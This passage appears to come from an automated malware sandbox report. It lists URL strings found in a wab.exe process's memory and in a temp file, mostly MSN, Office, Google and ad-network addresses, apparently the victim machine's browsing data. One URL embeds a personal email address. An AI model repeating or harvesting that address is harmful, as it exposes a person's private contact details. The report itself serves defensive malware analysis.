              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/asyncchunk/win10hostlogin_ppassword_545f714b012517
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_5b54317b5869f142bd86.js
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://maps.windows.com/windows-app-web-link
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://mwf-service.akamaized.net/mwf/css/bundle/1.57.0/west-european/default/mwf-main.min.css
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://mwf-service.akamaized.net/mwf/js/bundle/1.57.0/mwf-auto-init-main.var.min.js
              Source: wab.exe, 0000000A.00000003.26365735882.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26365703627.00000000030CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.offi
              Source: wab.exe, 0000000A.00000003.26365735882.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26365703627.00000000030CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeap
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://odc.officeapps.live.com/odc/jsonstrings?g=EmailHrdv2&mkt=1033&hm=2
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://odc.officeapps.live.com/odc/stat/hrd.css?b=14512.30550
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://odc.officeapps.live.com/odc/stat/hrd.min.js?b=14512.30550
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://odc.officeapps.live.com/odc/stat/hrd.min.js?b=16521.30551
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/federationProvider?domain=outlook.com&_=1632306668408
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/federationProvider?domain=outlook.com&_=1685097289379
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=0&ver=16&build=1
              Source: wab.exe, 0000000A.00000003.26361207951.00000000050A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26361732964.00000000050A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26360848532.00000000050A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26363979719.00000000030C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26361278373.00000000050A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26361499437.00000000050A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26371488160.00000000030BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26361893694.00000000050A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26371718325.00000000030BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26361424228.00000000050A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26359132217.00000000030C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26361059681.00000000050A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26361574298.00000000050A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26360989932.00000000050A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26362409031.00000000050A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26371901995.00000000030BF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26360917779.00000000050A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26362312132.00000000050A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26371827570.00000000030BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26362470528.00000000050A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26360801253.00000000030CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=1
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/idp?hm=1&emailAddress=shahak.shapira%40outlook.com&_=168509
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/idp?hm=2&emailAddress=shahak.shapira%40outlook.com&_=163230
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://outlookmobile-office365-tas.msedge.net/ab?clientId=512A4435-60B8-42A2-80D3-582B6B7FB6C0&ig=1
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?2787436b358dbd81d7fd0a0cccb05788
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?2f068a709ecd1f0c000b440d901cea9b
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://pagead2.googlesyndication.com/bg/4j6j1KaqOj9dOTqNDUFIq-pj8a-_5PTo96X1Pctm55w.js
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://pagead2.googlesyndication.com/getconfig/sodar?sv=200&tid=gda&tv=r20210916&st=env
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_csp?id=adbundle&qqi=CPuOuO2wkvMCFQDJuwgdDw4EyQ&gqi=
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://pagead2.googlesyndication.com/pagead/managed/js/adsense/m202109200101/show_ads_impl_with_ama
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://pagead2.googlesyndication.com/pagead/show_ads.js
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://partner.googleadservices.com/gampad/cookie.js?domain=ib.adnxs.com&callback=_gfp_s_&client=ca
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://partner.googleadservices.com/gampad/cookie.js?domain=www.msn.com&callback=_gfp_s_&client=ca-
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://pki.goog/repository/0
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://polyfill.io/v3/polyfill.min.js?features=2CElement.prototype.matches%2CElement.prototype.clos
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://px.ads.linkedin.com/setuid?partner=tripleliftdbredirect&tlUid=13122329571212727769&dbredirec
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://s.yimg.com/lo/api/res/1.2/7zPvmktG8JzqA0vnWzpk_g--~A/Zmk9Zml0O3c9NjIyO2g9MzY4O2FwcGlkPWdlbWl
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://s1.adform.net/Banners/Elements/Files/2070608/10170131/10170131.js?ADFassetID=10170131&bv=258
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://s1.adform.net/Banners/Elements/Files/2070608/10170131/bvpath_258/pics/footer.png
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://s1.adform.net/Banners/Elements/Files/2070608/10170131/bvpath_258/pics/k2.jpg
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://s1.adform.net/Banners/Elements/Files/2070608/10170131/bvpath_258/pics/k3.jpg
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://s1.adform.net/Banners/Elements/Files/2070608/10170131/bvpath_258/pics/k4.jpg
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://s1.adform.net/banners/scripts/rmb/Adform.DHTML.js?bv=0.5146119884770144
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://s1.adform.net/banners/scripts/rmb/Adform.DHTML.js?bv=626
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://s1.adform.net/stoat/626/s1.adform.net/bootstrap.js
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://s1.adform.net/stoat/626/s1.adform.net/load/v/0.0.209/e/-gABoCBA/i/vCAv.IAAAAAoAA/r:AdConstru
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://sb.scorecardresearch.com/b2?c1=2&c2=3000001&cs_ucfr=1&rn=1632306836522&c7=https%3A%2F%2Fwww.
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://sb.scorecardresearch.com/beacon.js
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://sectigo.com/CPS0
              Source: wab.exe, 0000000A.00000003.26363979719.00000000030C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26361278373.00000000050A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26361499437.00000000050A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26371488160.00000000030BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26362370177.00000000030CD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26361893694.00000000050A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26361424228.00000000050A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26361059681.00000000050A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26361574298.00000000050A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26360989932.00000000050A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26362409031.00000000050A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26360917779.00000000050A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26362312132.00000000050A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26362470528.00000000050A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26360801253.00000000030CD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26361654540.00000000050A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26361811934.00000000050A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26360732775.00000000050A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26362652368.00000000050A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26362593824.00000000050A6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26362533542.00000000050A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://servedby.flashtalking.com/imp/8/106228;3700839;201;jsiframe;Adobe;1000x463DESKTOPACROBATREAD
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://srtb.msn.com/auction?a=de-ch&b=4aeddfea844042999a22bdcca1fba378&c=MSN&d=https%3A%2F%2Fwww.ms
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://srtb.msn.com/auction?a=de-ch&b=838b780a64e64b0d92d628632c1c377c&c=MSN&d=https%3A%2F%2Fwww.ms
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://srtb.msn.com/auction?a=de-ch&b=bba24733ba4a487f8f8706bf3811269e&c=MSN&d=https%3A%2F%2Fwww.ms
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jque
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/css/f60532dd-d68e7b58/direct
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-2923b6c2/directi
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-d017f019/directi
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/cfdbd9.png
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAKp8YX.img?h=16&w=16&
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAMqFmF.img?h=16&w=16&
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAODMk8.img?h=75&w=100
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAODQmd.img?h=75&w=100
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAODept.img?h=75&w=100
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOEFck.img?h=75&w=100
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOEQ0I.img?h=368&w=62
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOF4WR.img?h=75&w=100
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOF4Xx.img?h=368&w=62
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFBrV.img?h=75&w=100
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFC5q.img?h=75&w=100
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFCgW.img?h=250&w=30
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFCgW.img?h=75&w=100
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFE0J.img?h=75&w=100
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFENj.img?h=75&w=100
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFJFJ.img?h=75&w=100
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFLk7.img?h=75&w=100
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFWV8.img?h=75&w=100
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFhty.img?h=368&w=62
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFsUC.img?h=250&w=30
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFu51.img?h=75&w=100
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFy7B.img?h=75&w=100
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFyKG.img?h=75&w=100
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOG3Y7.img?h=250&w=30
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOG3Y7.img?h=75&w=100
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOG88s.img?h=75&w=100
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOGPXq.img?h=194&w=30
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOGQtJ.img?h=75&w=100
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOGV90.img?h=194&w=30
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOGapF.img?h=75&w=100
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOGlbE.img?h=75&w=100
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOGmTG.img?h=75&w=100
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOGyYN.img?h=194&w=30
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOH2Ml.img?h=194&w=30
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOH6xB.img?h=75&w=100
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB14hq0P.img?h=368&w=6
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1aXBV1.img?h=27&w=27
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cEP3G.img?h=27&w=27
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cG73h.img?h=27&w=27
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1ftEY0.img?h=16&w=16
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1gEFcn.img?h=16&w=16
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1kc8s.img?m=6&o=true
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7gRE.img?h=16&w=16&m
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7hg4.img?h=16&w=16&m
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuddh.img?h=16&w=16&
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w=27&
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static-spartan-neu-s-msn-com.akamaized.net/_h/975a7d20/webcore/externalscripts/jquery/jquery
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static-spartan-neu-s-msn-com.akamaized.net/spartan/en-gb/_ssc/css/b5dff51-e7c3b187/kernel-9c
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static-spartan-neu-s-msn-com.akamaized.net/spartan/en-gb/_ssc/js/b5dff51-96897e59/kernel-1e4
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static.doubleclick.net/dynamic/5/283983386/11928812572019506176_2845462151855228713.jpeg
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static.doubleclick.net/dynamic/5/283983386/2578937774238713912_2802581922324906360.jpeg
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static.doubleclick.net/dynamic/5/283983386/6852827437855218848_345419970373613283.jpeg
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-bold.wof
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-light.wo
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-regular.
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-semibold
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-semiligh
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://statics-marketingsites-neu-ms-com.akamaized.net/statics/override.css
              Source: wab.exe, 0000000A.00000003.26370403186.00000000030D3000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.26374130201.00000000030D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://sync-t1.taboola.com/sg/criteortb-network/1/rtb-h/?taboola_hm=b2df1cf6-0873-4430-916b-9612e80
              Source: wab.exe, 0000000A.00000003.26365735882.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26365703627.00000000030CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tpc.g
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://tpc.googlesyndication.com/pagead/gadgets/html5/ssrh.js
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://tpc.googlesyndication.com/pagead/gadgets/in_page_full_auto_V1/Responsive_Monte_GpaSingleIfra
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://tpc.googlesyndication.com/pagead/js/r20210916/r20110914/abg_lite.js
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://tpc.googlesyndication.com/pagead/js/r20210916/r20110914/client/qs_click_protection.js
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://tpc.googlesyndication.com/pagead/js/r20210916/r20110914/client/window_focus.js
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://tpc.googlesyndication.com/simgad/14585816484902221120
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://tpc.googlesyndication.com/sodar/sodar2.js
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://tpc.googlesyndication.com/sodar/sodar2/224/runner.html
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://use.typekit.net/af/40207f/0000000000000000000176ff/27/d?subset_id=2&fvd=n3&v=3
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://use.typekit.net/af/cb695f/000000000000000000017701/27/d?subset_id=2&fvd=n4&v=3
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://use.typekit.net/af/eaf09c/000000000000000000017703/27/d?subset_id=2&fvd=n7&v=3
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://use.typekit.net/ecr2zvs.js
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://www.digicert.com/CPS0
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://www.globalsign.com/repository/0
              Source: wab.exe, wab.exe, 0000000C.00000002.26338031304.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://www.google.com/
              Source: wab.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
              Source: wab.exe, 0000000A.00000003.26363979719.00000000030C1000.00000004.00000020.00020000.00000000.sdmp, bhv1B7E.tmp.10.drString found in binary or memory: https://www.google.com/chrome/
              Source: wab.exe, 0000000A.00000003.26365735882.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26365703627.00000000030CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/https://
              Source: wab.exe, 0000000A.00000003.26363979719.00000000030C1000.00000004.00000020.00020000.00000000.sdmp, bhv1B7E.tmp.10.drString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
              Source: wab.exe, 0000000A.00000003.26365735882.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26365703627.00000000030CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/pa
              Source: wab.exe, 0000000A.00000003.26363979719.00000000030C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26365735882.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26365703627.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, bhv1B7E.tmp.10.drString found in binary or memory: https://www.google.com/pagead/drt/ui
              Source: wab.exe, 0000000A.00000003.26365735882.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26365703627.00000000030CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/api
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://www.google.com/recaptcha/api2/aframe
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://www.googleadservices.com/pagead/p3p.xml
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://www.googletagservices.com/activeview/js/current/osd.js
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://www.googletagservices.com/activeview/js/current/rx_lidar.js?cache=r20110914
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://www.msn.com
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://www.msn.com/
              Source: wab.exe, 0000000A.00000003.26365735882.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26365703627.00000000030CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=ie
              Source: wab.exe, 0000000A.00000003.26363979719.00000000030C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26359132217.00000000030C1000.00000004.00000020.00020000.00000000.sdmp, bhv1B7E.tmp.10.drString found in binary or memory: https://www.msn.com/?ocid=iehp
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/consent/55a804ab-e5c6-4b97-9319-8
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/assets/otFl
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/assets/v2/o
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/otBannerSdk
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/otTCF-ie.js
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/scripttemplates/otSDKStub.js
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://www.msn.com/de-ch/homepage/secure/silentpassport?secure=true&lc=2055
              Source: wab.exe, 0000000A.00000003.26365735882.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26365703627.00000000030CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/https://
              Source: wab.exe, 0000000A.00000003.26365735882.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26365703627.00000000030CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/https://www.msn.com/de-c
